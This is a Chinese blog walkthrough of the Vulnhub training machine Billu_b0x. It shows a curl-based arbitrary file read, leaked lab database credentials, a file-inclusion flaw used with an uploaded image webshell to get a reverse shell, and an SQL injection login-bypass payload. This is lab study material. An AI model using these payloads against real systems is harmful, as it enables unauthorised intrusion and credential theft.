Billu_b0x

最新推荐文章于 2024-08-16 15:15:00 发布
最新推荐文章于 2024-08-16 15:15:00 发布
阅读量203 收藏
点赞数 3
分类专栏: Vulnhub 文章标签: 网络安全 web安全 学习 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/134893369
版权

信息收集

#正常进行信息收集就好

Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-18 22:07 CST
Nmap scan report for 192.168.182.142 (192.168.182.142)
Host is up (0.00073s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /test.php: Test page
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
MAC Address: 00:0C:29:A9:EF:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.10 seconds

只开放了两个端口,分别是22端口和80端口。貌似存在一个test.php测试页面!突破点就是在80端口上了,一旦找到用户名和密码,就可进行ssh登录尝试。

渗透测试

首页是这样的!看到提示可能是存在sql注入? 这里进行了测试,发现貌似并没有sql注入漏洞!

看看test测试页面是什么:

哦?这里出现了参数file,这个file参数的值还是路径! 那么很可能就是文件包含漏洞!

利用curl进行测试:

确定任意文件读取的漏洞!尝试读取shadow文件!

没有权限读取!既然这样的话,看看都存在什么文件吧,进行目录爆破:

下面就是依次看看这些文件都是什么作用!

add.php

利用任意文件读取漏洞,读取这个文件的源码:

<?php
  echo '<form  method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name=image>
        <input type=text name=name value="name">
        <input type=text name=address value="address">
        <input type=text name=id value=1337 >
    <input type="submit" value="upload" name="upload">
</form>';
?>

C

这个界面打开是空白的,所以我们尝试直接读取这个文件里面的内容!

curl -d "file=c.php" http://192.168.182.142/test.php
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }
?>

发现数据库的账号和密码!!

billu   b0x_billu

in

phpmy

数据库!直接使用上面的数据库账号和密码进行登录即可!

在auth表里面找到了网站的登录账号和密码!

尝试直接登录网站!

panel.php

成功登录网站之后,便来到了panel界面!这个界面可以上传文件:

可以上传文件!来到了这里我就开始了上传,发现在上传的时候,只能上传png jpg gif文件,一直绕过,发现绕不过去,当前的php版本信息是5.3.10 小于5.4版本,尝试使用%df来进行绕过,但是发现并不能绕过!

这里就糊涂了,没通过任意文件读取,去看看panel文件的源码是什么,而是转到了ssh上面,尝试无果!

回想起来当前的页面,于是就看了下源码!

<?php
session_start();

include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
                header('Location: index.php', true, 302);
                exit();

}



echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
        unset($_SESSION['logged']);
        unset($_SESSION['admin']);
        header('Location: index.php', true, 302);
}
echo '<hr><br>';

echo '<form method=post>

<select name=load>
    <option value="show">Show Users</option>
        <option value="add">Add User</option>
</select> 

 &nbsp<input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
        $dir=getcwd();
        $choice=str_replace('./','',$_POST['load']);

        if($choice==='add')
        {
                include($dir.'/'.$choice.'.php');
                        die();
        }

        if($choice==='show')
        {
        
                include($dir.'/'.$choice.'.php');
                die();
        }
        else
        {
                include($dir.'/'.$_POST['load']);
        }

}


if(isset($_POST['upload']))
{

        $name=mysqli_real_escape_string($conn,$_POST['name']);
        $address=mysqli_real_escape_string($conn,$_POST['address']);
        $id=mysqli_real_escape_string($conn,$_POST['id']);

        if(!empty($_FILES['image']['name']))
        {
                $iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
        $r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
        $image=array('jpeg','jpg','gif','png');
        if(in_array($r,$image))
        {
                $finfo = @new finfo(FILEINFO_MIME); 
        $filetype = @$finfo->file($_FILES['image']['tmp_name']);
                if(preg_match('/image\/jpeg/',$filetype )  || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
                                {
                                        if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
                                                         {
                                                          echo "Uploaded successfully ";
                                                          $update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')'; 
                                                         mysqli_query($conn, $update);
                                                          
                                                        }
                                }
                        else
                        {
                                echo "<br>i told you dear, only png,jpg and gif file are allowed";
                        }
        }
        else
        {
                echo "<br>only png,jpg and gif file are allowed";

        }
}


}

?>

发现这个页面存在文件包含漏洞!只要存在continue参数和load参数即可进行文件包含了!因此continue的参数值 为 任意,但是load参数的值是我们的马子的地址就行!(那就好了 我们不需要直接传php的马了 穿图片马就行了)

直接在panel里面复制图片马的地址:

成功执行我们的代码!接下来就是生成php的反弹shell 的马,再利用文件包含漏洞进行getshell!

提权

直接利用kali中自带的反弹shell的脚本进行getshell了!

拿到初始的shell之后,查看内核信息,这个版本之前遇到过很经典的内核漏洞!

利用

攻击机上起php服务,利用靶机进行下载!

补充

其实我们在首页就已经提示我们说“Show me your SQLI skills” 但是我们并没有找到相关sql注入的漏洞!既然存在任意文件读取漏洞,那么我们就可以利用他来读取index.php的内容!

<?php
session_start();

include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
        $_SESSION['logged']='';

}

if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
{

        echo "you are logged in :)";
        header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font> 
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
        $uname=str_replace('\'','',urldecode($_POST['un']));
        $pass=str_replace('\'','',urldecode($_POST['ps']));
        $run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
        $result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {

$row = mysqli_fetch_assoc($result);
           echo "You are allowed<br>";
           $_SESSION['logged']=true;
           $_SESSION['admin']=$row['username'];
           
         header('Location: panel.php', true, 302);
   
}
else
{
        echo "<script>alert('Try again');</script>";
}

}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";

?>

然后我们便可以找到三个关键的sql注入的过滤语句:

$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';

整个过滤是针对单引号进行的过滤!

我们只需要输入:

select * from auth where pass='\'and uname='or 1=1-- \';
select * from auth where pass='\'and uname='or 1=1#';

这里的整体的思路是这样的:当我们输入“\”的时候,其实在select的语句中,是转义字符的意思,那么我们针对select * from auth where pass='\'and uname='or 1=1-- \'; 来说就是pass=' 这个单引号和uname='的引号闭合!!!(\'and uname=)括号里面的内容就是pass的内容! 然后后面的or 1=1以及-- 注释使得我们能够成功的登录到系统里面!

登陆进行就正常操作即可了!

这里还有一个知识点就是phpmyadmin的默认配置文件名字:config.inc.php 默认的路径就是在phpmyadmin下面!

既然这里利用dirsearch发现了路径:phpmy 那么猜测这个路径下面可能存在着config.inc.php文件!

这里确实读取到了这个文件!里面还有root的账号和密码!!直接ssh登录即可!

Y4y17
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机渗透学习----Billu_b0x
qq_42133828的博客
06-07 2911
靶机下载地址及安装环境 靶机下载地址:https://download.vulnhub.com/billu/ 靶机环境:处于net网络下的VM虚拟机 渗透实战 攻击机:192.168.146.131 靶 机:192.168.146.133(扫描后得到的) 1.安装完后,由于不知道node靶机的地址,所以渗透第一步就是发现主机: 1)使用nmap快速扫描,发现存活主机: nma...
VnlnHub Billu_b0x
weixin_45682839的博客
10-09 382
涉及知识包括:端口服务探测、敏感目录收集、SQL注入、文件上传漏洞、任意文件包含漏洞、linux本地提权、任意文件下载漏洞、敏感信息收集等。
VulnHub渗透实战--Billu_b0x
crispr的博客
02-05 970
Billu_b0x 0X01 Main Point 1.简单的代码审计 2. 文件包含漏洞(LFI) 读取源码 3. 文件上传得到webshell 4. Linux内核提权(Ubuntu 12.04) 5. SQLI 0X02 前期嗅探和端口探测 arp-scan -l #得到靶机IP nmap -sV -A -p- 172.20.10.3 #探测靶机端口及系统情况 常规的开放...
靶机渗透日记 Billu_b0x
Anonymous
03-09 308
端口 访问 80 端口 目录扫描 /add.php 文件下存在文件上传 没有上传成功 /test.php 缺少 file 参数,构造URL http://ip/test.php?file=/etc/passwd 尝试不行,使用 post 方式 依次读取目录扫描到的文件 //add.php <?php echo '<form method="post" enctype="multipart/form-data"> Select image to ..
【VulnHub】billu_b0x靶场复盘
redwand的博客
01-21 4581
此题目主要训练三方面要点,一是post方法下的文件包含,二是post方法下的getshell,三是[CVE-2015-1328]的利用。很多细节不错,值得入手一练。
Vulnhub 靶机 Billu_b0x
干铮的博客
10-10 909
1.主机发现 ping扫描 Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.217 -A -p- -oN nmap.A C:\Users\ASUS>Nmap 192.168.43.217 -A -p- -oN nmap.A Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-09 14:29 ?D1ú±ê×?ê±?? Nmap scan report for indishell (192.
Billu_b0x2[靶机]
weixin_43736033的博客
03-14 558
主机发现: 端口探测: 开了四个端口 22 80 111 8080 用dirb扫了一下网站 访问install.php 给我跳转到了 搜了一下版本号 8.3.x存在远程执行漏洞 找到匹配时间的exp 设置set RHOST 开始攻击 拿到shell 内核是4.4.0的 提权方法没找出来 在网上搜的payload Find / -perm -u=s -type f 2&gt;/de...
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
VMware-ovftool-4.4.0-15722219-win.x86_64.rar
05-03
《VMware ovftool在虚拟化管理中的应用与问题解析》 VMware ovftool,全称为OVF Tool,是一款由VMware公司推出的强大工具,主要用于处理OVF(Open Virtualization Format)和OVA(OVF Archive)文件,是虚拟化环境...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups ...比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8390
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Animetronic - hackmyvm
tanbinn的博客
08-12 472
hackmyvm的Animetronic靶场
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 152
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
网络协议八 网络安全相关
hunandede的博客
08-12 429
ARP欺骗的防护原理。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-16 766
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
最新发布
2401_85023531的博客
08-16 1278
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
网络安全 DVWA通关指南 DVWA File Inclusion(文件包含)
YueXuan_521的博客
08-16 485
网络安全 DVWA通关指南 DVWA File Inclusion(文件包含) 但我们可以使用file伪协议读取到文件。(这个地方需要文件的绝对路径,与Low级别不同,这里的报错信息需要提交以file开头的不存在文件或路径,否则会返回统一错误页面)文件包含漏洞的产生原因是 PHP 语言在通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者校验被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。当被包含的文件在服务器本地时,就形成的本地文件包含漏洞。
文件上传-.htaccess利用
feiwujiushiwo的博客
08-13 400
限于Apache.htaccess文件是服务器中的一个配置文件,它负责相关目录下的网页配置。笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。
Python操作MySQL与提权:Blumbergh用户下的数据库操纵与反弹Shell
Vulnhub是一个提供真实世界的安全漏洞环境的靶场平台,它包含了一系列的虚拟机镜像,如Breach1.0、Billu_b0x等,供安全研究人员和爱好者进行实战练习和技能提升。通过这些练习,我们可以熟悉不同的攻击手法和防御...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值